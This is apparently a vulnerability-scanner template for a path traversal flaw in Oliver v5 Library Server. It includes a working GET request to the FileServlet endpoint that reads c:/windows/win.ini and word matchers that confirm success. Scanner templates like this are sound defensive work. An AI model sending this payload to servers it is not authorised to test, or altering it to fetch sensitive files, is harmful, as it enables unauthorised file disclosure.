id: oliver-library-lfi
info:
name: Oliver Library Server v5 <8.00.008.053 - Arbitrary File Retrieval
author: gy741
severity: high
description: An arbitrary file retrieval vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file retrieval by an attacker using unsanitized user supplied input.
reference:
- https://www.exploit-db.com/exploits/50599
- https://www.softlinkint.com/product/oliver/
tags: windows,lfi,oliver
requests:
- method: GET
path:
- "{{BaseURL}}/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini"
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and